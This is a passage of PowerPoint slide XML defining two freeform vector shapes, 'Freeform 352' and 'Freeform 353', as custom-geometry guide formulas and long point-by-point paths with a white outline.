                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36219" name="Freeform 352"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="851" y="1198"/>
                <a:ext cx="287" cy="234"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 83 w 287"/>
                  <a:gd name="T1" fmla="*/ 37 h 234"/>
                  <a:gd name="T2" fmla="*/ 110 w 287"/>
                  <a:gd name="T3" fmla="*/ 29 h 234"/>
                  <a:gd name="T4" fmla="*/ 119 w 287"/>
                  <a:gd name="T5" fmla="*/ 55 h 234"/>
                  <a:gd name="T6" fmla="*/ 134 w 287"/>
                  <a:gd name="T7" fmla="*/ 45 h 234"/>
                  <a:gd name="T8" fmla="*/ 134 w 287"/>
                  <a:gd name="T9" fmla="*/ 21 h 234"/>
                  <a:gd name="T10" fmla="*/ 154 w 287"/>
                  <a:gd name="T11" fmla="*/ 29 h 234"/>
                  <a:gd name="T12" fmla="*/ 162 w 287"/>
                  <a:gd name="T13" fmla="*/ 53 h 234"/>
                  <a:gd name="T14" fmla="*/ 181 w 287"/>
                  <a:gd name="T15" fmla="*/ 79 h 234"/>
                  <a:gd name="T16" fmla="*/ 170 w 287"/>
                  <a:gd name="T17" fmla="*/ 8 h 234"/>
                  <a:gd name="T18" fmla="*/ 198 w 287"/>
                  <a:gd name="T19" fmla="*/ 10 h 234"/>
                  <a:gd name="T20" fmla="*/ 217 w 287"/>
                  <a:gd name="T21" fmla="*/ 39 h 234"/>
                  <a:gd name="T22" fmla="*/ 224 w 287"/>
                  <a:gd name="T23" fmla="*/ 77 h 234"/>
                  <a:gd name="T24" fmla="*/ 230 w 287"/>
                  <a:gd name="T25" fmla="*/ 101 h 234"/>
                  <a:gd name="T26" fmla="*/ 230 w 287"/>
                  <a:gd name="T27" fmla="*/ 124 h 234"/>
                  <a:gd name="T28" fmla="*/ 252 w 287"/>
                  <a:gd name="T29" fmla="*/ 147 h 234"/>
                  <a:gd name="T30" fmla="*/ 285 w 287"/>
                  <a:gd name="T31" fmla="*/ 169 h 234"/>
                  <a:gd name="T32" fmla="*/ 278 w 287"/>
                  <a:gd name="T33" fmla="*/ 186 h 234"/>
                  <a:gd name="T34" fmla="*/ 262 w 287"/>
                  <a:gd name="T35" fmla="*/ 180 h 234"/>
                  <a:gd name="T36" fmla="*/ 248 w 287"/>
                  <a:gd name="T37" fmla="*/ 187 h 234"/>
                  <a:gd name="T38" fmla="*/ 262 w 287"/>
                  <a:gd name="T39" fmla="*/ 197 h 234"/>
                  <a:gd name="T40" fmla="*/ 273 w 287"/>
                  <a:gd name="T41" fmla="*/ 210 h 234"/>
                  <a:gd name="T42" fmla="*/ 261 w 287"/>
                  <a:gd name="T43" fmla="*/ 220 h 234"/>
                  <a:gd name="T44" fmla="*/ 235 w 287"/>
                  <a:gd name="T45" fmla="*/ 221 h 234"/>
                  <a:gd name="T46" fmla="*/ 203 w 287"/>
                  <a:gd name="T47" fmla="*/ 201 h 234"/>
                  <a:gd name="T48" fmla="*/ 192 w 287"/>
                  <a:gd name="T49" fmla="*/ 196 h 234"/>
                  <a:gd name="T50" fmla="*/ 174 w 287"/>
                  <a:gd name="T51" fmla="*/ 214 h 234"/>
                  <a:gd name="T52" fmla="*/ 136 w 287"/>
                  <a:gd name="T53" fmla="*/ 231 h 234"/>
                  <a:gd name="T54" fmla="*/ 103 w 287"/>
                  <a:gd name="T55" fmla="*/ 232 h 234"/>
                  <a:gd name="T56" fmla="*/ 86 w 287"/>
                  <a:gd name="T57" fmla="*/ 228 h 234"/>
                  <a:gd name="T58" fmla="*/ 87 w 287"/>
                  <a:gd name="T59" fmla="*/ 211 h 234"/>
                  <a:gd name="T60" fmla="*/ 58 w 287"/>
                  <a:gd name="T61" fmla="*/ 203 h 234"/>
                  <a:gd name="T62" fmla="*/ 37 w 287"/>
                  <a:gd name="T63" fmla="*/ 193 h 234"/>
                  <a:gd name="T64" fmla="*/ 25 w 287"/>
                  <a:gd name="T65" fmla="*/ 170 h 234"/>
                  <a:gd name="T66" fmla="*/ 44 w 287"/>
                  <a:gd name="T67" fmla="*/ 160 h 234"/>
                  <a:gd name="T68" fmla="*/ 61 w 287"/>
                  <a:gd name="T69" fmla="*/ 158 h 234"/>
                  <a:gd name="T70" fmla="*/ 95 w 287"/>
                  <a:gd name="T71" fmla="*/ 160 h 234"/>
                  <a:gd name="T72" fmla="*/ 118 w 287"/>
                  <a:gd name="T73" fmla="*/ 156 h 234"/>
                  <a:gd name="T74" fmla="*/ 83 w 287"/>
                  <a:gd name="T75" fmla="*/ 136 h 234"/>
                  <a:gd name="T76" fmla="*/ 31 w 287"/>
                  <a:gd name="T77" fmla="*/ 136 h 234"/>
                  <a:gd name="T78" fmla="*/ 8 w 287"/>
                  <a:gd name="T79" fmla="*/ 125 h 234"/>
                  <a:gd name="T80" fmla="*/ 16 w 287"/>
                  <a:gd name="T81" fmla="*/ 118 h 234"/>
                  <a:gd name="T82" fmla="*/ 45 w 287"/>
                  <a:gd name="T83" fmla="*/ 111 h 234"/>
                  <a:gd name="T84" fmla="*/ 52 w 287"/>
                  <a:gd name="T85" fmla="*/ 95 h 234"/>
                  <a:gd name="T86" fmla="*/ 24 w 287"/>
                  <a:gd name="T87" fmla="*/ 99 h 234"/>
                  <a:gd name="T88" fmla="*/ 10 w 287"/>
                  <a:gd name="T89" fmla="*/ 82 h 234"/>
                  <a:gd name="T90" fmla="*/ 0 w 287"/>
                  <a:gd name="T91" fmla="*/ 72 h 234"/>
                  <a:gd name="T92" fmla="*/ 34 w 287"/>
                  <a:gd name="T93" fmla="*/ 25 h 234"/>
                  <a:gd name="T94" fmla="*/ 56 w 287"/>
                  <a:gd name="T95" fmla="*/ 10 h 234"/>
                  <a:gd name="T96" fmla="*/ 76 w 287"/>
                  <a:gd name="T97" fmla="*/ 7 h 234"/>
                  <a:gd name="T98" fmla="*/ 72 w 287"/>
                  <a:gd name="T99" fmla="*/ 41 h 234"/>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287"/>
                  <a:gd name="T151" fmla="*/ 0 h 234"/>
                  <a:gd name="T152" fmla="*/ 287 w 287"/>
                  <a:gd name="T153" fmla="*/ 234 h 234"/>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287" h="234">
                    <a:moveTo>
                      <a:pt x="72" y="41"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="41"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36220" name="Freeform 353"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1311" y="1170"/>
                <a:ext cx="457" cy="520"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 297 w 457"/>
                  <a:gd name="T1" fmla="*/ 459 h 520"/>
                  <a:gd name="T2" fmla="*/ 250 w 457"/>
                  <a:gd name="T3" fmla="*/ 415 h 520"/>
                  <a:gd name="T4" fmla="*/ 226 w 457"/>
                  <a:gd name="T5" fmla="*/ 429 h 520"/>
                  <a:gd name="T6" fmla="*/ 190 w 457"/>
                  <a:gd name="T7" fmla="*/ 413 h 520"/>
                  <a:gd name="T8" fmla="*/ 222 w 457"/>
                  <a:gd name="T9" fmla="*/ 397 h 520"/>
                  <a:gd name="T10" fmla="*/ 243 w 457"/>
                  <a:gd name="T11" fmla="*/ 394 h 520"/>
                  <a:gd name="T12" fmla="*/ 249 w 457"/>
                  <a:gd name="T13" fmla="*/ 366 h 520"/>
                  <a:gd name="T14" fmla="*/ 277 w 457"/>
                  <a:gd name="T15" fmla="*/ 325 h 520"/>
                  <a:gd name="T16" fmla="*/ 255 w 457"/>
                  <a:gd name="T17" fmla="*/ 268 h 520"/>
                  <a:gd name="T18" fmla="*/ 227 w 457"/>
                  <a:gd name="T19" fmla="*/ 252 h 520"/>
                  <a:gd name="T20" fmla="*/ 218 w 457"/>
                  <a:gd name="T21" fmla="*/ 222 h 520"/>
                  <a:gd name="T22" fmla="*/ 181 w 457"/>
                  <a:gd name="T23" fmla="*/ 178 h 520"/>
                  <a:gd name="T24" fmla="*/ 148 w 457"/>
                  <a:gd name="T25" fmla="*/ 163 h 520"/>
                  <a:gd name="T26" fmla="*/ 171 w 457"/>
                  <a:gd name="T27" fmla="*/ 204 h 520"/>
                  <a:gd name="T28" fmla="*/ 141 w 457"/>
                  <a:gd name="T29" fmla="*/ 198 h 520"/>
                  <a:gd name="T30" fmla="*/ 117 w 457"/>
                  <a:gd name="T31" fmla="*/ 201 h 520"/>
                  <a:gd name="T32" fmla="*/ 57 w 457"/>
                  <a:gd name="T33" fmla="*/ 190 h 520"/>
                  <a:gd name="T34" fmla="*/ 25 w 457"/>
                  <a:gd name="T35" fmla="*/ 177 h 520"/>
                  <a:gd name="T36" fmla="*/ 43 w 457"/>
                  <a:gd name="T37" fmla="*/ 155 h 520"/>
                  <a:gd name="T38" fmla="*/ 9 w 457"/>
                  <a:gd name="T39" fmla="*/ 130 h 520"/>
                  <a:gd name="T40" fmla="*/ 3 w 457"/>
                  <a:gd name="T41" fmla="*/ 83 h 520"/>
                  <a:gd name="T42" fmla="*/ 33 w 457"/>
                  <a:gd name="T43" fmla="*/ 13 h 520"/>
                  <a:gd name="T44" fmla="*/ 75 w 457"/>
                  <a:gd name="T45" fmla="*/ 6 h 520"/>
                  <a:gd name="T46" fmla="*/ 57 w 457"/>
                  <a:gd name="T47" fmla="*/ 85 h 520"/>
                  <a:gd name="T48" fmla="*/ 65 w 457"/>
                  <a:gd name="T49" fmla="*/ 145 h 520"/>
                  <a:gd name="T50" fmla="*/ 76 w 457"/>
                  <a:gd name="T51" fmla="*/ 113 h 520"/>
                  <a:gd name="T52" fmla="*/ 82 w 457"/>
                  <a:gd name="T53" fmla="*/ 77 h 520"/>
                  <a:gd name="T54" fmla="*/ 97 w 457"/>
                  <a:gd name="T55" fmla="*/ 45 h 520"/>
                  <a:gd name="T56" fmla="*/ 124 w 457"/>
                  <a:gd name="T57" fmla="*/ 6 h 520"/>
                  <a:gd name="T58" fmla="*/ 142 w 457"/>
                  <a:gd name="T59" fmla="*/ 82 h 520"/>
                  <a:gd name="T60" fmla="*/ 169 w 457"/>
                  <a:gd name="T61" fmla="*/ 82 h 520"/>
                  <a:gd name="T62" fmla="*/ 181 w 457"/>
                  <a:gd name="T63" fmla="*/ 82 h 520"/>
                  <a:gd name="T64" fmla="*/ 228 w 457"/>
                  <a:gd name="T65" fmla="*/ 70 h 520"/>
                  <a:gd name="T66" fmla="*/ 245 w 457"/>
                  <a:gd name="T67" fmla="*/ 106 h 520"/>
                  <a:gd name="T68" fmla="*/ 252 w 457"/>
                  <a:gd name="T69" fmla="*/ 117 h 520"/>
                  <a:gd name="T70" fmla="*/ 291 w 457"/>
                  <a:gd name="T71" fmla="*/ 126 h 520"/>
                  <a:gd name="T72" fmla="*/ 307 w 457"/>
                  <a:gd name="T73" fmla="*/ 147 h 520"/>
                  <a:gd name="T74" fmla="*/ 342 w 457"/>
                  <a:gd name="T75" fmla="*/ 173 h 520"/>
                  <a:gd name="T76" fmla="*/ 334 w 457"/>
                  <a:gd name="T77" fmla="*/ 196 h 520"/>
                  <a:gd name="T78" fmla="*/ 364 w 457"/>
                  <a:gd name="T79" fmla="*/ 208 h 520"/>
                  <a:gd name="T80" fmla="*/ 365 w 457"/>
                  <a:gd name="T81" fmla="*/ 225 h 520"/>
                  <a:gd name="T82" fmla="*/ 343 w 457"/>
                  <a:gd name="T83" fmla="*/ 229 h 520"/>
                  <a:gd name="T84" fmla="*/ 346 w 457"/>
                  <a:gd name="T85" fmla="*/ 260 h 520"/>
                  <a:gd name="T86" fmla="*/ 378 w 457"/>
                  <a:gd name="T87" fmla="*/ 287 h 520"/>
                  <a:gd name="T88" fmla="*/ 413 w 457"/>
                  <a:gd name="T89" fmla="*/ 312 h 520"/>
                  <a:gd name="T90" fmla="*/ 428 w 457"/>
                  <a:gd name="T91" fmla="*/ 321 h 520"/>
                  <a:gd name="T92" fmla="*/ 457 w 457"/>
                  <a:gd name="T93" fmla="*/ 343 h 520"/>
                  <a:gd name="T94" fmla="*/ 434 w 457"/>
                  <a:gd name="T95" fmla="*/ 355 h 520"/>
                  <a:gd name="T96" fmla="*/ 428 w 457"/>
                  <a:gd name="T97" fmla="*/ 381 h 520"/>
                  <a:gd name="T98" fmla="*/ 408 w 457"/>
                  <a:gd name="T99" fmla="*/ 396 h 520"/>
                  <a:gd name="T100" fmla="*/ 394 w 457"/>
                  <a:gd name="T101" fmla="*/ 368 h 520"/>
                  <a:gd name="T102" fmla="*/ 358 w 457"/>
                  <a:gd name="T103" fmla="*/ 348 h 520"/>
                  <a:gd name="T104" fmla="*/ 353 w 457"/>
                  <a:gd name="T105" fmla="*/ 367 h 520"/>
                  <a:gd name="T106" fmla="*/ 363 w 457"/>
                  <a:gd name="T107" fmla="*/ 394 h 520"/>
                  <a:gd name="T108" fmla="*/ 396 w 457"/>
                  <a:gd name="T109" fmla="*/ 428 h 520"/>
                  <a:gd name="T110" fmla="*/ 407 w 457"/>
                  <a:gd name="T111" fmla="*/ 463 h 520"/>
                  <a:gd name="T112" fmla="*/ 401 w 457"/>
                  <a:gd name="T113" fmla="*/ 481 h 520"/>
                  <a:gd name="T114" fmla="*/ 386 w 457"/>
                  <a:gd name="T115" fmla="*/ 478 h 520"/>
                  <a:gd name="T116" fmla="*/ 354 w 457"/>
                  <a:gd name="T117" fmla="*/ 463 h 520"/>
                  <a:gd name="T118" fmla="*/ 361 w 457"/>
                  <a:gd name="T119" fmla="*/ 484 h 520"/>
                  <a:gd name="T120" fmla="*/ 349 w 457"/>
                  <a:gd name="T121" fmla="*/ 504 h 520"/>
                  <a:gd name="T122" fmla="*/ 307 w 457"/>
                  <a:gd name="T123" fmla="*/ 484 h 520"/>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457"/>
                  <a:gd name="T187" fmla="*/ 0 h 520"/>
                  <a:gd name="T188" fmla="*/ 457 w 457"/>
                  <a:gd name="T189" fmla="*/ 520 h 520"/>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457" h="520">
                    <a:moveTo>
                      <a:pt x="307" y="484"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="305" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
